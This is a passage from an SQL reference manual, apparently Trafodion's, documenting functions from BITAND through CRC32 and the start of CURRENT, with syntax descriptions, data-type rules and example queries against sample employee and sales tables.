BITAND\r\n\r\n```\r\n>>select bitand(1,3) from (values(1)) x(a);\r\n\r\n(EXPR)\r\n--------------\r\n 1\r\n\r\n--- 1 row(s) selected\r\n\r\n>>select 1 & 3 from (values(1)) x(a);\r\n\r\n(EXPR)\r\n--------------\r\n 1\r\n\r\n--- 1 row(s) selected\r\n\r\n>>select bitand(1,3) + 0 from (values(1)) x(a);\r\n\r\n(EXPR)\r\n--------------\r\n 1\r\n\r\n--- 1 row(s) selected\r\n```\r\n\r\n<<<\r\n[[case_expression]]\r\n== CASE (Conditional) Expression\r\n\r\nThe CASE expression is a conditional expression with two forms: simple\r\nand searched.\r\n\r\nIn a simple CASE expression, {project-name} SQL compares a value to a\r\nsequence of values and sets the CASE expression to the value associated\r\nwith the first match — if a match exists. If no match exists, {project-name}\r\nSQL returns the value specified in the ELSE clause (which can be null).\r\n\r\nIn a searched CASE expression, {project-name} SQL evaluates a sequence of\r\nconditions and sets the CASE expression to the value associated with the\r\nfirst condition that is true — if a true condition exists. If no true\r\ncondition exists, {project-name} SQL returns the value specified in the ELSE\r\nclause (which can be null).\r\n\r\n*Simple CASE is*:\r\n\r\n```\r\nCASE case-expression\r\n WHEN expression-1 THEN {result-expression-1 | NULL}\r\n WHEN expression-2 THEN {result-expression-2 | NULL}\r\n ...\r\n WHEN expression-n THEN {result-expression-n | NULL}\r\n [ELSE {result-expression | NULL}]\r\nEND\r\n```\r\n\r\n*Searched CASE is*:\r\n\r\n```\r\nCASE\r\n WHEN _condition-1_ THEN {_result-expression-1_ | NULL}\r\n WHEN _condition-2_ THEN {_result-expression-2_ | NULL}\r\n ...\r\n WHEN _condition-n_ THEN {_result-expression-n_ | NULL}\r\n [ELSE {_result-expression_ | NULL}]\r\nEND\r\n```\r\n\r\n* `_case-expression_`\r\n+\r\nspecifies a value expression that is compared to the value expressions\r\nin each WHEN clause of a simple CASE. The data type of each _expression_\r\nin the WHEN clause must be comparable to the data type of\r\n_case-expression_.\r\n\r\n* `_expression-1_ … _expression-n_`\r\n+\r\nspecifies a value associated with each _result-expression_. If the\r\nvalue of an _expression_ in a WHEN clause matches the value of\r\n_case-expression_, simple CASE returns the associated\r\n_result-expression_ value. If no match exists, the CASE expression\r\nreturns the value expression specified in the ELSE clause, or NULL if\r\nthe ELSE value is not specified.\r\n\r\n* `_result-expression-1_ … _result-expression-n_`\r\n+\r\nspecifies the result value expression associated with each _expression_\r\nin a WHEN clause of a simple CASE, or with each _condition_ in a WHEN\r\nclause of a searched CASE. All of the _result-expressions_ must have\r\ncomparable data types, and at least one of the\r\n_result-expressions_ must return non-null.\r\n\r\n* `_result-expression_`\r\n+\r\nfollows the ELSE keyword and specifies the value returned if none of the\r\nexpressions in the WHEN clause of a simple CASE are equal to the case\r\nexpression, or if none of the conditions in the WHEN clause of a\r\nsearched CASE are true. If the ELSE _result-expression_ clause is not\r\nspecified, CASE returns NULL. The data type of _result-expression_ must\r\nbe comparable to the other results.\r\n\r\n* `_condition-1_ … _condition-n_`\r\n\r\nspecifies conditions to test for in a searched CASE. If a _condition_ is\r\ntrue, the CASE expression returns the associated _result-expression_\r\nvalue. If no _condition_ is true, the CASE expression returns the value\r\nexpression specified in the ELSE clause, or NULL if the ELSE value is\r\nnot specified.\r\n\r\n[[considerations_for_case]]\r\n=== Considerations for CASE\r\n\r\n[[data_type_of_the_case_expression]]\r\n==== Data Type of the CASE Expression\r\n\r\nThe data type of the result of the CASE expression depends on the data\r\ntypes of the result expressions. If the results all have the same data\r\ntype, the CASE expression adopts that data type. If the results have\r\ncomparable but not identical data types, the CASE expression adopts the\r\ndata type of the union of the result expressions. This result data type\r\nis determined in these ways.\r\n\r\n[[character_data_type]]\r\n==== Character Data Type\r\n\r\nIf any data type of the result expressions is variable-length character\r\nstring, the result data type is variable-length character string with\r\nmaximum length equal to the maximum length of the result expressions.\r\n\r\nOtherwise, if none of the data types is variable-length character\r\nstring, the result data type is fixed-length character string with length\r\nequal to the maximum of the lengths of the result expressions.\r\n\r\n[[numeric_data_type]]\r\n==== Numeric Data Type\r\n\r\nIf all of the data types of the result expressions are exact numeric,\r\nthe result data type is exact numeric with precision and scale equal to\r\nthe maximum of the precisions and scales of the result expressions.\r\n\r\nFor example, if _result-expression-1_ and _result-expression-2_ have\r\ndata type NUMERIC(5) and _result-expression-3_ has data type\r\nNUMERIC(8,5), the result data type is NUMERIC(10,5).\r\n\r\nIf any data type of the result expressions is approximate numeric, the\r\nresult data type is approximate numeric with precision equal to the\r\nmaximum of the precisions of the result expressions.\r\n\r\n[[datetime_data_type]]\r\n==== Datetime Data Type\r\n\r\nIf the data type of the result expressions is datetime, the result data\r\ntype is the same datetime data type.\r\n\r\n[[interval_data_type]]\r\n==== Interval Data Type\r\n\r\nIf the data type of the result expressions is interval, the result data\r\ntype is the same interval data type (either year-month or day-time) with\r\nthe start field being the most significant of the start fields of the\r\nresult expressions and the end field being the least significant of the\r\nend fields of the result expressions.\r\n\r\n[[examples_of_case]]\r\n=== Examples of CASE\r\n\r\n* Use a simple CASE to decode JOBCODE and return NULL if JOBCODE does\r\nnot match any of the listed values:\r\n+\r\n```\r\nSELECT\r\n last_name\r\n, first_name\r\n, CASE jobcode\r\n WHEN 100 THEN 'MANAGER'\r\n WHEN 200 THEN 'PRODUCTION SUPV'\r\n WHEN 250 THEN 'ASSEMBLER'\r\n WHEN 300 THEN 'SALESREP'\r\n WHEN 400 THEN 'SYSTEM ANALYST'\r\n WHEN 420 THEN 'ENGINEER'\r\n WHEN 450 THEN 'PROGRAMMER'\r\n WHEN 500 THEN 'ACCOUNTANT'\r\n WHEN 600 THEN 'ADMINISTRATOR ANALYST'\r\n WHEN 900 THEN 'SECRETARY'\r\n ELSE NULL\r\n END\r\nFROM persnl.employee;\r\n\r\nLAST_NAME FIRST_NAME (EXPR)\r\n-------------------- --------------- -----------------\r\nGREEN ROGER MANAGER\r\nHOWARD JERRY MANAGER\r\nRAYMOND JANE MANAGER\r\n...\r\nCHOU JOHN SECRETARY\r\nCONRAD MANFRED PROGRAMMER\r\nHERMAN JIM SALESREP\r\nCLARK LARRY ACCOUNTANT\r\nHALL KATHRYN SYSTEM ANALYST\r\n...\r\n\r\n--- 62 row(s) selected.\r\n```\r\n\r\n* Use a searched CASE to return LAST_NAME, FIRST_NAME and a value based\r\non SALARY that depends on the value of DEPTNUM:\r\n+\r\n```\r\nSELECT\r\n last_name\r\n, first_name\r\n, deptnum\r\n, CASE\r\n WHEN deptnum = 9000 THEN salary * 1.10\r\n WHEN deptnum = 1000 THEN salary * 1.12 ELSE salary\r\n END\r\nFROM persnl.employee;\r\n\r\nLAST_NAME FIRST_NAME DEPTNUM (EXPR)\r\n---------------- ------------ ------- -------------------\r\nGREEN ROGER 9000 193050.0000\r\nHOWARD JERRY 1000 153440.1120\r\nRAYMOND JANE 3000 136000.0000\r\n...\r\n\r\n--- 62 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[cast_expression]]\r\n== CAST Expression\r\n\r\nThe CAST expression converts data to the data type you specify.\r\n\r\n```\r\nCAST ({expression | NULL} AS data-type) \r\n```\r\n\r\n* `_expression_ | NULL`\r\n+\r\nspecifies the operand to convert to the data type _data-type_.\r\n+\r\nIf the operand is an _expression_, then _data-type_ depends on the\r\ndata type of _expression_ and follows the rules outlined in\r\n<<valid_conversions_for_cast,Valid Conversions for CAST >>.\r\n+\r\nIf the operand is NULL, or if the value of the _expression_ is null, the\r\nresult of CAST is NULL, regardless of the data type you specify.\r\n\r\n* `_data-type_`\r\n+\r\nspecifies a data type to associate with the operand of CAST. See\r\n<<data_types,Data Types>>.\r\n+\r\nWhen casting data to a CHAR or VARCHAR data type, the resulting data\r\nvalue is left justified. Otherwise, the resulting data value is right\r\njustified. Further, when you are casting to a CHAR or VARCHAR data type,\r\nyou must specify the length of the target value.\r\n\r\n[[considerations_for_cast]]\r\n=== Considerations for CAST\r\n\r\n* Fractional portions are discarded when you use CAST of a numeric value to an INTERVAL type.\r\n* Depending on how your file is set up, using CAST might cause poor\r\nquery performance by preventing the optimizer from choosing the most\r\nefficient plan and requiring the executor to perform a complete table or\r\nindex scan.\r\n\r\n[[valid_conversions_for_cast]]\r\n==== Valid Conversions for CAST\r\n\r\n* An exact or approximate numeric value to any other numeric data type.\r\n* An exact or approximate numeric value to any character string data type.\r\n* An exact numeric value to either a single-field year-month or day-time interval such as INTERVAL DAY(2).\r\n* A character string to any other data type, with one restriction:\r\n\r\nThe contents of the character string to be converted must be consistent\r\nin meaning with the data type of the result. For example, if you are\r\nconverting to DATE, the contents of the character string must be 10\r\ncharacters consisting of the year, a hyphen, the month, another hyphen,\r\nand the day.\r\n\r\n* A date value to a character string or to a TIMESTAMP ({project-name} SQL fills in the time part with 00:00:00.00).\r\n* A time value to a character string or to a TIMESTAMP ({project-name} SQL fills in the date part with the current date).\r\n* A timestamp value to a character string, a DATE, a TIME, or another TIMESTAMP with different fractional seconds precision.\r\n* A year-month interval value to a character string, an exact numeric,\r\nor to another year-month INTERVAL with a different start field precision.\r\n* A day-time interval value to a character string, an exact numeric, or\r\nto another day-time INTERVAL with a different start field precision.\r\n\r\n[[examples_of_cast]]\r\n=== Examples of CAST\r\n\r\n* In this example, the fractional portion is discarded:\r\n+\r\n```\r\nCAST (123.956 as INTERVAL DAY(18))\r\n```\r\n\r\n* This example returns the difference of two timestamps in minutes:\r\n+\r\n```\r\nCAST((d.step_end - d.step_start) AS INTERVAL MINUTE)\r\n```\r\n\r\n* Suppose that your database includes a log file of user information.\r\nThis example converts the current timestamp to a character string and\r\nconcatenates the result to a character literal. Note the length must be\r\nspecified.\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, user_info)\r\nVALUES (001, 'User JBrook, executed at ' || CAST (CURRENT_TIMESTAMP AS CHAR(26)));\r\n```\r\n\r\n<<<\r\n[[ceiling_function]]\r\n== CEILING Function\r\n\r\nThe CEILING function returns the smallest integer, represented as a\r\nFLOAT data type, greater than or equal to a numeric value expression.\r\n\r\nCEILING is a {project-name} SQL extension.\r\n\r\n```\r\nCEILING (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the CEILING function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_ceiling]]\r\n=== Examples of CEILING\r\n\r\n* This function returns the integer value 3.00000000000000000E+000,\r\nrepresented as a FLOAT data type:\r\n+\r\n```\r\nCEILING (2.25)\r\n```\r\n\r\n<<<\r\n[[char_function]]\r\n=== CHAR Function\r\n\r\nThe CHAR function returns the character that has the specified code\r\nvalue, which must be of exact numeric with scale 0.\r\n\r\nCHAR is a {project-name} SQL extension.\r\n\r\n```\r\nCHAR(code-value, [,char-set-name])\r\n```\r\n\r\n* `_code-value_`\r\n+\r\nis a valid code value in the character set in use.\r\n\r\n* `_char-set-name_`\r\n+\r\ncan be ISO88591 or UTF8. The returned character will be associated with\r\nthe character set specified by _char-set-name_.\r\n+\r\nThe default for _char-set-name_ is ISO88591.\r\n\r\n[[considerations_for_char]]\r\n=== Considerations for CHAR\r\n\r\n* For the ISO88591 character set, the return type is VARCHAR(1).\r\n* For the UTF8 character set, the return type is VARCHAR(1).\r\n\r\n[[examples_of_char]]\r\n=== Examples of CHAR\r\n\r\n* Select the column CUSTNAME and return the ASCII code of the first\r\ncharacter of the customer name and its CHAR value:\r\n+\r\n```\r\nSELECT custname, ASCII (custname), CHAR (ASCII (custname))\r\nFROM sales.customer;\r\n\r\nCUSTNAME (EXPR) ( EXPR)\r\n------------------ ------- -------\r\nCENTRAL UNIVERSITY 67 C\r\nBROWN MEDICAL CO 66 B\r\nSTEVENS SUPPLY 83 S\r\nPREMIER INSURANCE 80 P\r\n... ... ...\r\n\r\n--- 15 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[char_length_function]]\r\n== CHAR_LENGTH Function\r\n\r\nThe CHAR_LENGTH function returns the number of characters in a string.\r\nYou can also use CHARACTER_LENGTH. Every character, including multi-byte\r\ncharacters, counts as one character.\r\n\r\n```\r\nCHAR[ACTER]_LENGTH (string-value-expression)\r\n```\r\n\r\n* `_string-value-expression_`\r\n+\r\nspecifies the string value expression for which to return the length in\r\ncharacters. {project-name} SQL returns the result as a two-byte signed\r\ninteger with a scale of zero. If _string-value-expression_ is null,\r\n{project-name} SQL returns a length of\r\nnull. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_char_length]]\r\n=== Considerations for CHAR_LENGTH\r\n\r\n[[char_and_varchar_operands]]\r\n==== CHAR and VARCHAR Operands\r\n\r\nFor a column declared as fixed CHAR, {project-name} SQL returns the maximum\r\nlength of that column. For a VARCHAR column, {project-name} SQL returns the\r\nactual length of the string stored in that column.\r\n\r\n[[examples_of_char_length]]\r\n=== Examples of CHAR_LENGTH\r\n\r\n\r\n* This function returns 12 as the result. The concatenation operator is\r\ndenoted by two vertical bars (\\|\\|).\r\n+\r\n```\r\nCHAR_LENGTH ('ROBERT' || ' ' || 'SMITH')\r\n```\r\n\r\n* The string '' is the null (or empty) string. This function returns 0\r\n(zero):\r\n+\r\n```\r\nCHAR_LENGTH ('')\r\n```\r\n\r\n* The DEPTNAME column has data type CHAR(12). Therefore, this function\r\nalways returns 12:\r\n+\r\n```\r\nCHAR_LENGTH (deptname)\r\n```\r\n\r\n* The PROJDESC column in the PROJECT table has data type VARCHAR(18).\r\nThis function returns the actual length of the column value — not 18 for\r\nshorter strings — because it is a VARCHAR value:\r\n+\r\n```\r\nSELECT CHAR_LENGTH (projdesc) FROM persnl.project;\r\n\r\n(EXPR)\r\n----------\r\n 14\r\n 13\r\n 13\r\n 17\r\n 9\r\n 9\r\n\r\n--- 6 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[coalesce_function]]\r\n== COALESCE Function\r\n\r\nThe COALESCE function returns the value of the first expression in the\r\nlist that does not have a NULL value or if all the expressions have NULL\r\nvalues, the function returns a NULL value.\r\n\r\n```\r\nCOALESCE (expr1, expr2, ...)\r\n```\r\n\r\n* `_expr1_`\r\n+\r\nan expression to be compared.\r\n\r\n* `_expr2_`\r\n+\r\nan expression to be compared.\r\n\r\n[[examples_of_coalesce]]\r\n=== Examples of COALESCE\r\n\r\n* COALESCE returns the value of the first operand that is not NULL:\r\n+\r\n```\r\nSELECT COALESCE (office_phone, cell_phone, home_phone, pager, fax_num, '411')\r\nfrom emptbl;\r\n```\r\n\r\n<<<\r\n[[code_value_function]]\r\n== CODE_VALUE Function\r\n\r\nThe CODE_VALUE function returns an unsigned integer (INTEGER UNSIGNED)\r\nthat is the code point of the first character in a character value\r\nexpression that can be associated with one of the supported character\r\nsets.\r\n\r\nCODE_VALUE is a {project-name} SQL extension.\r\n\r\n```\r\nCODE_VALUE(character-value-expression)\r\n character-set\r\n```\r\n\r\n* `_character-value-expression_`\r\n+\r\nis a character string.\r\n\r\n\r\n[[examples_of_code_value_function]]\r\n=== Examples of CODE_VALUE Function\r\n\r\n* This function returns 97 as the result:\r\n+\r\n```\r\n>>select code_value('abc') from (values(1))x;\r\n\r\n(EXPR)\r\n----------\r\n 97\r\n```\r\n\r\n<<<\r\n[[concat_function]]\r\n=== CONCAT Function\r\n\r\nThe CONCAT function returns the concatenation of two character value\r\nexpressions as a character string value. You can also use the\r\nconcatenation operator (\\|\\|).\r\n\r\nCONCAT is a {project-name} SQL extension.\r\n\r\n```\r\nCONCAT (character-expr-1, character-expr-2)\r\n```\r\n\r\n* `_character-expr-1_, _character-expr-2_`\r\n+\r\nare SQL character value expressions (of data type CHAR or VARCHAR) that\r\nspecify two strings of characters. Both character value expressions must\r\nbe either ISO8859-1 character expressions or UTF8 character expressions.\r\nThe result of the CONCAT function is the concatenation of\r\n_character-expr-1_ with _character-expr-2_. The result type is CHAR if\r\nboth expressions are of type CHAR and it is VARCHAR if either of the\r\nexpressions is of type VARCHAR.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n\r\n[[concatenation_operator]]\r\n=== Concatenation Operator (||)\r\n\r\nThe concatenation operator, denoted by two vertical bars (||),\r\nconcatenates two string values to form a new string value. To indicate\r\nthat two strings are concatenated, connect the strings with two vertical\r\nbars (\\|\\|):\r\n\r\n```\r\ncharacter-expr-1 || character-expr-2\r\n```\r\n\r\nAn operand can be any SQL value expression of data type CHAR or VARCHAR.\r\n\r\n[[considerations_for_concat]]\r\n=== Considerations for CONCAT\r\n\r\n[[operands]]\r\n=== Operands\r\n\r\n\r\nA string value can be specified by any character value expression, such\r\nas a character string literal, character string function, column\r\nreference, aggregate function, scalar subquery, CASE expression, or CAST\r\nexpression. The value of the operand must be of type CHAR or VARCHAR.\r\n\r\nIf you use the CAST expression, you must specify the length of CHAR or\r\nVARCHAR.\r\n\r\n\r\n[[sql-parameters]]\r\n=== SQL Parameters\r\n\r\nYou can concatenate an SQL parameter and a character value expression.\r\nThe concatenated parameter takes on the data type attributes of the\r\ncharacter value expression. Consider this example, where ?p is assigned\r\na string value of '5 March':\r\n\r\n?p || ' 2002'\r\n\r\nThe type assignment of the parameter ?p becomes CHAR(5), the same data\r\ntype as the character literal ' 2002'. Because you assigned a string\r\nvalue of more than five characters to ?p, {project-name} SQL returns a\r\ntruncation warning, and the result of the concatenation is 5 Mar 2002.\r\n\r\nTo specify the type assignment of the parameter, use the CAST expression\r\non the parameter as:\r\n\r\nCAST(?p AS CHAR(7)) || '2002'\r\n\r\nIn this example, the parameter is not truncated, and the result of the\r\nconcatenation is 5 March 2002.\r\n\r\n[[examples_of_concat]]\r\n=== Examples of CONCAT\r\n\r\n* Insert information consisting of a single character string. Use the\r\nCONCAT function to construct and insert the value:\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, user_info)\r\nVALUES (001, CONCAT ('Executed at ', CAST (CURRENT_TIMESTAMP AS CHAR(26))));\r\n```\r\n\r\n* Use the concatenation operator || to construct and insert the value:\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, user_info)\r\nVALUES (002, 'Executed at ' || CAST (CURRENT_TIMESTAMP AS CHAR(26)));\r\n```\r\n\r\n<<<\r\n[[converttohex_function]]\r\n== CONVERTTOHEX Function\r\n\r\nThe CONVERTTOHEX function converts the specified value expression to\r\nhexadecimal for display purposes.\r\n\r\nCONVERTTOHEX is a {project-name} SQL extension.\r\n\r\n```\r\nCONVERTTOHEX (expression)\r\n```\r\n\r\n_expression_\r\n\r\nis any numeric, character, datetime, or interval expression.\r\n\r\nThe primary purpose of the CONVERTTOHEX function is to eliminate any\r\ndoubt as to the exact value in a column. It is particularly useful for\r\ncharacter expressions where some characters may be from character sets\r\nthat are not supported by the client terminal's locale or may be control\r\ncodes or other non-displayable characters.\r\n\r\n[[considerations_for_converttohex]]\r\n=== Considerations for CONVERTTOHEX\r\n\r\nAlthough CONVERTTOHEX is usable on datetime and interval expressions,\r\nthe displayed output shows the internal value and is, consequently, not\r\nparticularly meaningful to general users and is subject to change in\r\nfuture releases.\r\n\r\nCONVERTTOHEX returns ASCII characters in ISO8859-1 encoding.\r\n\r\n<<<\r\n[[examples_of_converttohex]]\r\n=== Examples of CONVERTTOHEX\r\n\r\n* Display the contents of a smallint, integer, and largeint in\r\nhexadecimal:\r\n+\r\n```\r\nCREATE TABLE EG (S1 smallint, I1 int, L1 largeint);\r\n\r\nINSERT INTO EG VALUES( 37, 2147483647, 2305843009213693951);\r\n\r\nSELECT CONVERTTOHEX(S1), CONVERTTOHEX(I1), CONVERTTOHEX(L1) from EG;\r\n\r\n(EXPR) (EXPR) EXPR)\r\n------ -------- ----------------\r\n0025 7FFFFFFF 1FFFFFFFFFFFFFFF\r\n```\r\n\r\n* Display the contents of a CHAR(4) column, a VARCHAR(4) column, and a\r\nCHAR(4) column that uses the UTF8 character set. The varchar column does\r\nnot have a trailing space character as the fixed-length columns have:\r\n+\r\n```\r\nCREATE TABLE EG_CH (FC4 CHAR(4), VC4 VARCHAR(4), FC4U CHAR(4) CHARACTER SET UTF8);\r\n\r\nINSERT INTO EG_CH values('ABC', 'abc', _UTF8'abc');\r\n\r\nSELECT CONVERTTOHEX(FC4), CONVERTTOHEX(VC4), CONVERTTOHEX(FC4U) from EG_CH;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n-------- -------- ----------------\r\n41424320 616263 0061006200630020\r\n```\r\n\r\n* Display the internal values for a DATE column, a TIME column, a\r\nTIMESTAMP(2) column, and a TIMESTAMP(6) column:\r\n+\r\n```\r\nCREATE TABLE DT (D1 date, T1 time, TS1 timestamp(2), TS2 timestamp(6) );\r\nINSERT INTO DT values(current_date, current_time, current_timestamp, current_timestamp);\r\n\r\nSELECT CONVERTTOHEX(D1), CONVERTTOHEX(T1), CONVERTTOHEX(TS1), CONVERTTOHEX(TS2) from DT;\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR)\r\n----------- --------- ------------------------- -------------------------\r\n 07D8040F 0E201E 07D8040F0E201E00000035 07D8040F0E201E00081ABB\r\n```\r\n\r\n<<<\r\n* Display the internal values for an INTERVAL YEAR column, an INTERVAL\r\nYEAR(2) TO MONTH column, and an INTERVAL DAY TO SECOND column:\r\n+\r\n```\r\nCREATE TABLE IVT ( IV1 interval year, IV2 interval year(2) to month, IV3 interval day to second);\r\n\r\nINSERT INTO IVT values( interval '1' year, interval '3-2' year(2) to\r\nmonth, interval '31:14:59:58' day to second);\r\n\r\nSELECT CONVERTTOHEX(IV1), CONVERTTOHEX(IV2), CONVERTTOHEX(IV3) from IVT;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n------ -------- -----------------------\r\n 0001 0026 0000027C2F9CB780\r\n```\r\n\r\n<<<\r\n[[converttimestamp_function]]\r\n== CONVERTTIMESTAMP Function\r\n\r\nThe CONVERTTIMESTAMP function converts a Julian timestamp to a value\r\nwith data type TIMESTAMP.\r\n\r\nCONVERTTIMESTAMP is a {project-name} SQL extension.\r\n\r\n```\r\nCONVERTTIMESTAMP (julian-timestamp)\r\n```\r\n\r\n* `_julian-timestamp_`\r\n+\r\nis an expression that evaluates to a Julian timestamp, which is a\r\nLARGEINT value.\r\n\r\n[[considerations_for_converttimestamp]]\r\n=== Considerations for CONVERTTIMESTAMP\r\n\r\nThe _julian-timestamp_ value must be in the range from 148731\r\n63200000000 to 274927348799999999.\r\n\r\n\r\n[[relationship_to_the_juliantimestamp_function]]\r\n==== Relationship to the JULIANTIMESTAMP Function\r\n\r\nThe operand of CONVERTTIMESTAMP is a Julian timestamp, and the function\r\nresult is a value of data type TIMESTAMP. The operand of the\r\nCONVERTTIMESTAMP function is a value of data type TIMESTAMP, and the\r\nfunction result is a Julian timestamp. That is, the two functions have\r\nan inverse relationship to one another.\r\n\r\n[[use_of_converttimestamp]]\r\n==== Use of CONVERTTIMESTAMP\r\n\r\nYou can use the inverse relationship between the JULIANTIMESTAMP and\r\nCONVERTTIMESTAMP functions to insert Julian timestamp columns into your\r\ndatabase and display these column values in a TIMESTAMP format.\r\n\r\n<<<\r\n[[examples_of_converttimestamp]]\r\n=== Examples of CONVERTTIMESTAMP\r\n\r\n* Suppose that the EMPLOYEE table includes a column, named HIRE_DATE,\r\nwhich contains the hire date of each employee as a Julian timestamp.\r\nConvert the Julian timestamp into a TIMESTAMP value:\r\n+\r\n```\r\nSELECT CONVERTTIMESTAMP (hire_date) FROM persnl.employee;\r\n```\r\n\r\n* This example illustrates the inverse relationship between\r\nJULIANTIMESTAMP and CONVERTTIMESTAMP.\r\n+\r\n```\r\nSELECT CONVERTTIMESTAMP (JULIANTIMESTAMP (ship_timestamp)) FROM persnl.project;\r\n```\r\n+\r\nIf, for example, the value of SHIP_TIMESTAMP is 2008-04-03\r\n21:05:36.143000, the result of CONVERTTIMESTAMP(JULIANTIMESTAMP(ship_timestamp))\r\nis the same value, 2008-04-03 21:05:36.143000.\r\n\r\n<<<\r\n[[cos_function]]\r\n== COS Function\r\n\r\nThe COS function returns the cosine of a numeric value expression, where\r\nthe expression is an angle expressed in radians.\r\n\r\nCOS is a {project-name} SQL extension.\r\n\r\n```\r\nCOS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the COS function.\r\n\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_cos]]\r\n=== Examples of COS\r\n\r\n* This function returns the value 9.39680940386503680E-001, or\r\napproximately 0.9397, the cosine of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nCOS (0.3491)\r\n```\r\n\r\n<<<\r\n[[cosh_function]]\r\n=== COSH Function\r\n\r\nThe COSH function returns the hyperbolic cosine of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nCOSH is a {project-name} SQL extension.\r\n\r\n```\r\nCOSH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the COSH function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_cosh]]\r\n=== Examples of COSH\r\n\r\n* This function returns the value 1.88842387716101568E+000, or\r\napproximately 1.8884, the hyperbolic cosine of 1.25 in radians:\r\n+\r\n```\r\nCOSH (1.25)\r\n```\r\n\r\n<<<\r\n[[count_function]]\r\n=== COUNT Function\r\n\r\nThe COUNT function counts the number of rows that result from a query or\r\nthe number of rows that contain a distinct value in a specific column.\r\nThe result of COUNT is data type LARGEINT. The result can never be NULL.\r\n\r\n```\r\nCOUNT {(*) | ([ALL | DISTINCT] expression)}\r\n```\r\n\r\n* `COUNT (*)`\r\n+\r\nreturns the number of rows in the table specified in the FROM clause of\r\nthe SELECT statement that contains COUNT (\\*). If the result table is\r\nempty (that is, no rows are returned by the query) COUNT (*) returns\r\nzero.\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nreturns the number of all rows or the number of distinct rows in the\r\none-column table derived from the evaluation of _expression_. The\r\ndefault option is ALL, which causes duplicate values to be included. If\r\nyou specify DISTINCT, duplicate values are eliminated before the COUNT\r\nfunction is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression that determines the values to count. The\r\n_expression_ cannot contain an aggregate function or a subquery. The\r\nDISTINCT clause specifies that the COUNT function operates on distinct\r\nvalues from the one-column table derived from the evaluation of\r\n_expression_. See <<expressions,Expressions>>.\r\n\r\n[[considerations_for_count]]\r\n=== Considerations for COUNT\r\n\r\n[[operands-of-the-expression-1]]\r\n==== Operands of the Expression\r\n\r\nThe operand of COUNT is either * or an expression that includes columns\r\nfrom the result table specified by the SELECT statement that contains\r\nCOUNT. However, the expression cannot include an aggregate function or a\r\nsubquery. These expressions are valid:\r\n\r\n```\r\nCOUNT (*)\r\nCOUNT (DISTINCT JOBCODE)\r\nCOUNT (UNIT_PRICE * QTY_ORDERED)\r\n```\r\n\r\n<<<\r\n[[count_nulls]]\r\n==== Nulls\r\n\r\nCOUNT is evaluated after eliminating all nulls from the one-column table\r\nspecified by the operand. If the table has no rows, COUNT returns zero.\r\n\r\nCOUNT(\\*) does not eliminate null rows from the table specified in the\r\nFROM clause of the SELECT statement. If all rows in a table are null,\r\nCOUNT(\\*) returns the number of rows in the table.\r\n\r\n[[examples_of_count]]\r\n=== Examples of COUNT\r\n\r\n* Count the number of rows in the EMPLOYEE table:\r\n+\r\n```\r\nSELECT COUNT (*) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 62\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Count the number of employees who have a job code in the EMPLOYEE\r\ntable:\r\n+\r\n```\r\nSELECT COUNT (jobcode) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 56\r\n\r\n--- 1 row(s) selected.\r\n\r\nSELECT COUNT(*)\r\nFROM persnl.employee\r\nWHERE jobcode IS NOT NULL;\r\n\r\n(EXPR)\r\n-----------\r\n 56\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Count the number of distinct departments in the EMPLOYEE table:\r\n+\r\n```\r\nSELECT COUNT (DISTINCT deptnum) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 11\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[crc32_function]]\r\n == CRC32 Function\r\n \r\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value. \r\nThe result is NULL if the argument is NULL. The argument is expected to be a \r\nstring and (if possible) is treated as one if it is not.\r\n \r\n```\r\nCRC32{ expression)}\r\n```\r\n \r\n* `_expression_`\r\n+\r\nspecifies a value expression that determines the values to count. The\r\n_expression_ cannot contain an aggregate function or a subquery. \r\nSee <<expressions,Expressions>>.\r\n \r\n[[examples_of_crc32]]\r\n=== examples of CR32\r\n```\r\n>>SELECT CRC32('Trafodion') from dual;\r\n \r\n (EXPR)\r\n ----------\r\n \r\n 1960931967\r\n \r\n>>SELECT CRC32(2016) from dual;\r\n \r\n (EXPR)\r\n ----------\r\n \r\n 2177070256\r\n \r\n```\r\n<<<\r\n[[current_function]]\r\n== CURRENT Function\r\n\r\nThe CURRENT function returns a value of type TIMESTAMP based on the\r\ncurrent local date and time.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nYou can also use <<current_timestamp_function,CURRENT_TIMESTAMP Function>>.\r\n\r\n```\r\nCURRENT [(precision)]\r\n```\r\n\r\n* `_precision_`\r\n+\r\nis an integer value in the range 0 to 6 that specifies the precision of\r\n(the number of decimal places in) the fractional seconds in the returned\r\nvalue. The default is 6.\r\n+\r\nFor example, the function CURRENT (2) returns the current date and time\r\nas a value of data type TIMESTAMP, where the precision of the fractional\r\nseconds is 2, for example, 2008-06-26 09:01:20.89. The value returned 